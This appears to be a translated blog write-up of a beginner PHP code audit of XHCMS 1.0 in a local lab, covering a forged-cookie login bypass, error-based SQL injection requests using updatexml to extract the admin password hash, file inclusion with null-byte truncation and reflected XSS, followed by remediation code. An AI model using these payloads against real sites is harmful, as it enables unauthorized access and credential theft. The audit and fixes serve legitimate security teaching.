This is a fairly simple PHP code audit, a good one for beginners.
CMS download address:
https://down.chinaz.com/soft/36930.htm
Then set up the environment with phpStudy. The PHP version must be lower than 7, and you need to create a new database yourself.
Visit
http://localhost/xhcms1.0/install/index.php
CNVD lists quite a few vulnerabilities for this CMS, so let's try them one by one.
(1) Backend login bypass
The advisory hints that the login check can be bypassed by forging a cookie. The code is in inc\checklogin.php.
If user in the cookie is empty, it redirects to the login page, so we can bypass the check simply by giving user a value.
Access the admin/ page directly
and we land straight in the site backend.
(2) SQL injection in the user field of the backend login
The code is in admin\files\login.php
```php
""){   // the start of this condition is cut off in the extracted snippet
    $query = "SELECT * FROM manage WHERE user='$user'";   // $user concatenated unescaped
    $result = mysql_query($query) or die('SQL语句有误:'.mysql_error());   // raw MySQL error shown to the client
    $users = mysql_fetch_array($result);
    if (!mysql_num_rows($result)) {
        echo "";   // the echoed HTML/JS message was lost in extraction
        exit;
    } else {
        $passwords = $users['password'];
        //echo $passwords;
        if (md5($password) <> $passwords) {
            echo "";
            exit;
        }
        // write the login info and remember it for 30 days
        if ($checkbox == 1) {
            setcookie('user', $user, time()+3600*24*30, '/');   // the cookie value is just the username
        } else {
            setcookie('user', $user, 0, '/');
        }
        echo "";
        exit;
    }
    exit;
    ob_end_flush();
}
?>
```
user is not filtered at all; it is concatenated straight into the SQL statement, so we can build an error-based injection.
```http
POST /xhcms1.0/admin/?r=login HTTP/1.1
Host: 192.168.10.128
Content-Length: 95
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.10.128
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.10.128/xhcms1.0/admin/?r=login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

user=admin'or updatexml(1,concat(0x7e,mid((select password from manage),2,33)),1)#&password=123&login=yes
```
Crack the MD5 hash
and we find that the admin password is admin.
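As an added example (my own code, not XHCMS's), here is how the two backend login pieces above would look rewritten so that neither bug exists: the user value is bound as a prepared-statement parameter instead of being concatenated, and the logged-in state lives in a server-side session instead of a client-controlled user cookie. It assumes PHP 7 or newer, a PDO connection in $pdo, and that manage.password stores password_hash() output rather than a raw MD5; the function names and the redirect target are my assumptions.

```php
<?php
// Added example, not XHCMS code. Assumes PHP 7+, a PDO connection in $pdo
// (created with PDO::ATTR_EMULATE_PREPARES => false), and that
// manage.password stores password_hash() output instead of a raw MD5.
session_start();

/** Verify credentials with a bound parameter and a hashed password. */
function login(PDO $pdo, string $user, string $password): bool
{
    // The user value is bound, never concatenated, so a value such as
    // admin' or updatexml(...)# is a literal that simply matches no row.
    $stmt = $pdo->prepare('SELECT id, user, password FROM manage WHERE user = ? LIMIT 1');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // An unknown user and a wrong password fail the same way (no username
    // enumeration), and password_verify() compares in constant time.
    if ($row === false || !password_verify($password, $row['password'])) {
        return false;
    }

    // Login state is a server-side session, not a cookie the client chooses.
    session_regenerate_id(true);               // defeat session fixation
    $_SESSION['admin_id']   = (int) $row['id'];
    $_SESSION['admin_user'] = $row['user'];
    $_SESSION['login_time'] = time();
    return true;
}

/** Replacement for inc/checklogin.php: only the session proves a login. */
function requireLogin(): void
{
    if (empty($_SESSION['admin_id'])) {
        header('Location: ?r=login');
        exit;
    }
}

// Handling of the login form (same field names as the request shown above).
if (($_POST['login'] ?? '') === 'yes') {
    $user     = (string) ($_POST['user'] ?? '');
    $password = (string) ($_POST['password'] ?? '');
    if (login($pdo, $user, $password)) {
        header('Location: ./');                // assumed post-login page
        exit;
    }
    // Failed attempts are logged server-side so they can be alerted on; the
    // username is truncated so a long injected string cannot flood the log.
    error_log(sprintf('admin login failed for %s from %s',
        substr($user, 0, 32), $_SERVER['REMOTE_ADDR'] ?? '-'));
}
```

The original's "remember me for 30 days" option should not be reproduced by lengthening the cookie holding the username; if it is needed, store a random token server-side and put only that token in the cookie, so that forging user=admin proves nothing.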
(3) Front-end (and back-end) file inclusion
The front-end vulnerable code is in index.php, the back-end one in admin\index.php.
r is taken from GET, passed through addslashes, then checked, and then concatenated into the file include/read.
If the PHP version is 5.3.4 or lower, %00 truncation gives arbitrary file read; on newer versions only PHP files can be included.
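The fix for this class of bug is to stop treating r as a path fragment at all. The following front controller is an added example (my own code, not XHCMS's index.php): r is validated against a strict pattern, looked up in a whitelist of page names, and the resolved path is checked to still lie under the files directory. The whitelist is an assumption; the page only confirms that files/contact.php and files/content.php exist.

```php
<?php
// Added example, not XHCMS code. The allowed page list is assumed.

/**
 * Resolve the ?r= parameter to a file under $baseDir, or return null.
 * addslashes() is not a path filter: it leaves "../" and "%00" untouched,
 * so the original check only escapes quotes and never stops traversal.
 */
function resolvePage($baseDir, $r)
{
    static $allowed = array('index', 'contact', 'content');   // assumed list

    // 1. Only plain lowercase identifiers are acceptable. This rejects
    //    directory traversal, null bytes and stream wrappers before any
    //    filesystem call is made.
    if (!is_string($r) || !preg_match('/^[a-z][a-z0-9_]{0,31}$/', $r)) {
        return null;
    }
    // 2. Only names on the whitelist are routable at all.
    if (!in_array($r, $allowed, true)) {
        return null;
    }
    // 3. Defense in depth: the resolved real path must stay inside $baseDir.
    $path = realpath($baseDir . '/' . $r . '.php');
    $base = realpath($baseDir);
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$r    = isset($_GET['r']) ? $_GET['r'] : 'index';
$file = resolvePage(__DIR__ . '/files', $r);
if ($file === null) {
    // Log the rejected value: repeated "../" or "%00" attempts against a
    // whitelist router are a cheap detection signal.
    error_log('rejected r=' . substr((string) $r, 0, 64));
    http_response_code(404);
    exit('page not found');
}
require $file;
```

With the pattern check in place the PHP version no longer matters: whether or not %00 truncation works in the interpreter, the value never reaches require().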
(4) Backend SQL injection
1. admin/files/editcolumn
```php
$id=$_GET['id'];
$type=$_GET['type'];
if ($type==1){
    $query = "SELECT * FROM nav WHERE id='$id'";
    $resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());
    $nav = mysql_fetch_array($resul);
}
```
An obvious SQL injection
http://localhost/xhcms1.0/admin/index.php?r=editcolumn&type=1&id=1'%20or%20updatexml(1,concat(0x7e,database()),1)%23
2. admin/files/editlink.php
```php
$id=$_GET['id'];
$query = "SELECT * FROM link WHERE id='$id'";
$resul = mysql_query($query) or die('SQL语句有误:'.mysql_error());
$link = mysql_fetch_array($resul);
```
Almost identical
3. admin/files/editsoft.php and admin/files/editwz.php
Same thing
4. Closing the quote with and '1'='1 to build the injection
```http
POST /xhcms1.0/admin/index.php?r=editcolumn&type=1&id=1 HTTP/1.1
Host: 192.168.10.128
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user=admin
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 111

save=1&name=a' or updatexml(1,concat(0x7e,version()),1) and '1'='1&keywords=b&description=c&xs=d&px=e&content=f
```
There are many more like it, for example in manageinfo.php.
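All of the editcolumn/editlink/editsoft/editwz/manageinfo cases share one root cause, so one fix covers them. The block below is an added example (my own code, not XHCMS's) of the editcolumn pattern rewritten with PDO prepared statements: the id is cast and bound as an integer for the SELECT, and every posted text field from the save=1 request above is bound for the UPDATE. Table and field names follow the snippets on this page (nav.id and the posted name/keywords/description/xs/px/content fields); the UPDATE column list, the DSN and the credentials are assumptions.

```php
<?php
// Added example, not XHCMS code. DSN, database name and credentials are
// placeholders; the nav column list for the UPDATE is assumed.
$pdo = new PDO('mysql:host=127.0.0.1;dbname=xhcms;charset=utf8', 'DB_USER', 'DB_PASS', array(
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,     // real server-side prepares
));

/** SELECT by primary key with the id bound as an integer. */
function loadNav(PDO $pdo, $id)
{
    // id is an integer column: cast first, then bind as an int. A value like
    // 1' or updatexml(...)# becomes 1 and the quote never reaches MySQL.
    $stmt = $pdo->prepare('SELECT * FROM nav WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** UPDATE from the posted form with every field bound as a parameter. */
function saveNav(PDO $pdo, $id, array $post)
{
    // a' or updatexml(...) and '1'='1 is stored verbatim as the name column's
    // value; it is data, not part of the statement.
    $fields = array('name', 'keywords', 'description', 'xs', 'px', 'content');
    $params = array(':id' => (int) $id);
    foreach ($fields as $f) {
        $params[':' . $f] = isset($post[$f]) ? (string) $post[$f] : '';
    }
    $sql = 'UPDATE nav SET name = :name, keywords = :keywords, description = :description, '
         . 'xs = :xs, px = :px, content = :content WHERE id = :id';
    return $pdo->prepare($sql)->execute($params);
}

// Dispatch mirroring the original ?r=editcolumn&type=1&id=N flow.
$type = isset($_GET['type']) ? (int) $_GET['type'] : 0;
$id   = isset($_GET['id'])   ? (int) $_GET['id']   : 0;
try {
    if ($type === 1) {
        if (isset($_POST['save']) && $_POST['save'] === '1') {
            saveNav($pdo, $id, $_POST);
        }
        $nav = loadNav($pdo, $id);
    }
} catch (PDOException $e) {
    // Never echo the driver message. The updatexml trick on this page only
    // leaks data because the original prints mysql_error() to the browser;
    // keep the detail in the server log and return a generic error.
    error_log('editcolumn: ' . $e->getMessage());
    http_response_code(500);
    exit('database error');
}
```

Note that fixing the query alone is not enough for the error-based variant: as long as `die('SQL语句有误:'.mysql_error())` stays, any remaining injectable query turns into a data oracle, so removing the error echo is part of the fix.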
(5) Front-end XSS
1. /files/contact.php
/index.php?r=contact&page=
```php
$page=addslashes($_GET['page']);
if ($page<>""){
    if ($page<>1){
        $pages="第".$page."页 - ";
    }
}
```
No filtering, concatenated directly into the output.
2. /files/content.php
Much the same, via id.
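addslashes() is the wrong tool here: it escapes quotes for a PHP string literal, but HTML does not interpret backslashes, so a quote or a tag still breaks out of the page. The block below is an added example (my own code, not XHCMS's contact.php/content.php) of the two page/id cases handled properly: the value is validated to the type it should have, and whatever is echoed is HTML-encoded on output. The helper names are my own; the "第N页 - " string and the page and id parameters come from the snippets above.

```php
<?php
// Added example, not XHCMS code. h() and pageTitlePrefix() are assumed names.

/** Encode a value for an HTML text or quoted-attribute context. */
function h($value)
{
    // ENT_QUOTES covers both " and ', so the value is safe inside a
    // double- or single-quoted attribute as well as in element text.
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Build the "第N页 - " title prefix from a validated page number. */
function pageTitlePrefix($page)
{
    // Validate first: a page number is a non-negative integer, so anything
    // else (a tag, a quote, an event handler) is dropped before it can
    // reach the title at all.
    if (!is_string($page) && !is_int($page)) return '';
    if (!ctype_digit((string) $page)) return '';
    $n = (int) $page;
    return $n > 1 ? '第' . $n . '页 - ' : '';
}

// contact.php equivalent: ?r=contact&page=N
$page  = isset($_GET['page']) ? $_GET['page'] : '';
$pages = pageTitlePrefix($page);
echo '<title>' . h($pages) . 'Contact</title>';   // page title is assumed

// content.php equivalent: id is an integer key, so cast it, and still encode
// on output so the same template stays safe for any other reflected value.
$id = isset($_GET['id']) ? (int) $_GET['id'] : 0;
echo '<a href="?r=content&amp;id=' . h($id) . '">';
```

Validation and output encoding are complementary: the integer cast makes the value harmless for this page, and h() keeps the template safe if someone later echoes a free-text field through it.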
Source: https://blog.csdn.net/m0_60716947/article/details/128611888